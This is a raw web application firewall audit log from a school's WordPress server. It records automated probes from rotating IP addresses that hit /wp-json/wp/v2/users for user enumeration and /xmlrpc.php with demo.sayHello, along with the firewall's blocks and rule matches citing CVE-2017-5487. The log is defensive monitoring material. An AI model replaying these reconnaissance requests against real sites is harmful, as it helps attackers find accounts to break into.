Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322959765603 5279 (- - -) Stopwatch2: 1746322959765603 5279; combined=4002, p1=492, p2=3291, p3=30, p4=32, p5=93, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afaee21f-Z-- --afc12b17-A-- [04/May/2025:08:42:44 +0700] aBbGFPnZiHJYHUAF8Qfb3QAAAA4 103.236.140.4 35088 103.236.140.4 8181 --afc12b17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afc12b17-C-- demo.sayHello --afc12b17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --afc12b17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322964898018 5080 (- - -) Stopwatch2: 1746322964898018 5080; combined=3892, p1=585, p2=3100, p3=21, p4=22, p5=95, sr=188, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afc12b17-Z-- --a4dcb81d-A-- [04/May/2025:08:42:55 +0700] aBbGH9sVQyl9V2B8Pt-wUAAAAFA 103.236.140.4 35092 103.236.140.4 8181 --a4dcb81d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4dcb81d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4dcb81d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322975231341 3482 (- - -) Stopwatch2: 1746322975231341 3482; combined=1492, p1=467, p2=993, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4dcb81d-Z-- --fceb8623-A-- [04/May/2025:08:43:00 +0700] aBbGJNsVQyl9V2B8Pt-wUgAAAFI 103.236.140.4 35096 103.236.140.4 8181 --fceb8623-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fceb8623-C-- demo.sayHello --fceb8623-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fceb8623-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322980761455 5218 (- - -) Stopwatch2: 1746322980761455 5218; combined=4009, p1=438, p2=3308, p3=29, p4=30, p5=128, sr=68, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fceb8623-Z-- --9a4e5664-A-- [04/May/2025:08:43:05 +0700] aBbGKdsVQyl9V2B8Pt-wUwAAAFM 103.236.140.4 35098 103.236.140.4 8181 --9a4e5664-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9a4e5664-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4e5664-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746322985637513 3223 (- - -) Stopwatch2: 1746322985637513 3223; combined=1389, p1=541, p2=817, p3=0, p4=0, p5=30, sr=166, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4e5664-Z-- --6ec9494e-A-- [04/May/2025:08:43:11 +0700] aBbGL2JEE9ao5dcyYWnuhAAAAJc 103.236.140.4 35104 103.236.140.4 8181 --6ec9494e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ec9494e-C-- demo.sayHello --6ec9494e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ec9494e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746322991312070 6761 (- - -) Stopwatch2: 1746322991312070 6761; combined=4876, p1=652, p2=3963, p3=40, p4=43, p5=105, sr=120, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ec9494e-Z-- --27145f7d-A-- [04/May/2025:08:43:45 +0700] aBbGUechPF6irSergtv81gAAAMQ 103.236.140.4 35108 103.236.140.4 8181 --27145f7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --27145f7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27145f7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323025287868 16209 (- - -) Stopwatch2: 1746323025287868 16209; combined=26996, p1=480, p2=998, p3=0, p4=0, p5=12774, sr=74, sw=0, l=0, gc=12744 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27145f7d-Z-- --9eab925d-A-- [04/May/2025:08:43:51 +0700] aBbGV-chPF6irSergtv82AAAAMg 103.236.140.4 35112 103.236.140.4 8181 --9eab925d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9eab925d-C-- demo.sayHello --9eab925d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9eab925d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323031254569 6316 (- - -) Stopwatch2: 1746323031254569 6316; combined=4618, p1=575, p2=3803, p3=44, p4=41, p5=92, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9eab925d-Z-- --18a7ec36-A-- [04/May/2025:08:44:28 +0700] aBbGfNsVQyl9V2B8Pt-wVgAAAFY 103.236.140.4 35116 103.236.140.4 8181 --18a7ec36-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --18a7ec36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a7ec36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323068801493 3532 (- - -) Stopwatch2: 1746323068801493 3532; combined=1537, p1=518, p2=987, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a7ec36-Z-- --3e6fee79-A-- [04/May/2025:08:44:33 +0700] aBbGgechPF6irSergtv82wAAAMs 103.236.140.4 35120 103.236.140.4 8181 --3e6fee79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3e6fee79-C-- demo.sayHello --3e6fee79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e6fee79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323073461044 5001 (- - -) Stopwatch2: 1746323073461044 5001; combined=3828, p1=528, p2=3087, p3=26, p4=24, p5=95, sr=144, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e6fee79-Z-- --8c543c1e-A-- [04/May/2025:08:44:39 +0700] aBbGh-chPF6irSergtv83QAAAMw 103.236.140.4 35124 103.236.140.4 8181 --8c543c1e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8c543c1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c543c1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323079661891 2411 (- - -) Stopwatch2: 1746323079661891 2411; combined=1140, p1=409, p2=703, p3=0, p4=0, p5=27, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c543c1e-Z-- --ff24f243-A-- [04/May/2025:08:44:46 +0700] aBbGjuchPF6irSergtv83gAAAM4 103.236.140.4 35128 103.236.140.4 8181 --ff24f243-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff24f243-C-- demo.sayHello --ff24f243-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff24f243-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323086133698 6008 (- - -) Stopwatch2: 1746323086133698 6008; combined=4185, p1=567, p2=3391, p3=28, p4=32, p5=98, sr=75, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff24f243-Z-- --d721ba01-A-- [04/May/2025:08:45:02 +0700] aBbGnvnZiHJYHUAF8Qfb3gAAAA0 103.236.140.4 35136 103.236.140.4 8181 --d721ba01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d721ba01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d721ba01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323102634830 3150 (- - -) Stopwatch2: 1746323102634830 3150; combined=1279, p1=421, p2=828, p3=0, p4=0, p5=29, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d721ba01-Z-- --e7f1d926-A-- [04/May/2025:08:45:08 +0700] aBbGpNsVQyl9V2B8Pt-wWAAAAFc 103.236.140.4 35140 103.236.140.4 8181 --e7f1d926-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e7f1d926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7f1d926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323108078407 2141 (- - -) Stopwatch2: 1746323108078407 2141; combined=975, p1=341, p2=606, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7f1d926-Z-- --62610863-A-- [04/May/2025:08:45:08 +0700] aBbGpGJEE9ao5dcyYWnuhgAAAIE 103.236.140.4 35142 103.236.140.4 8181 --62610863-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --62610863-C-- demo.sayHello --62610863-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --62610863-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323108097069 5392 (- - -) Stopwatch2: 1746323108097069 5392; combined=4063, p1=528, p2=3325, p3=29, p4=32, p5=88, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62610863-Z-- --4029bd4d-A-- [04/May/2025:08:45:17 +0700] aBbGrechPF6irSergtv84QAAANE 103.236.140.4 35148 103.236.140.4 8181 --4029bd4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4029bd4d-C-- demo.sayHello --4029bd4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4029bd4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323117074212 5872 (- - -) Stopwatch2: 1746323117074212 5872; combined=4205, p1=544, p2=3440, p3=31, p4=35, p5=92, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4029bd4d-Z-- --1e0d4b10-A-- [04/May/2025:08:45:17 +0700] aBbGrfnZiHJYHUAF8Qfb3wAAAA8 103.236.140.4 35150 103.236.140.4 8181 --1e0d4b10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e0d4b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e0d4b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323117577114 2573 (- - -) Stopwatch2: 1746323117577114 2573; combined=1194, p1=439, p2=729, p3=0, p4=0, p5=26, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e0d4b10-Z-- --4e1f2b7f-A-- [04/May/2025:08:45:27 +0700] aBbGt_nZiHJYHUAF8Qfb4gAAABc 103.236.140.4 35158 103.236.140.4 8181 --4e1f2b7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4e1f2b7f-C-- 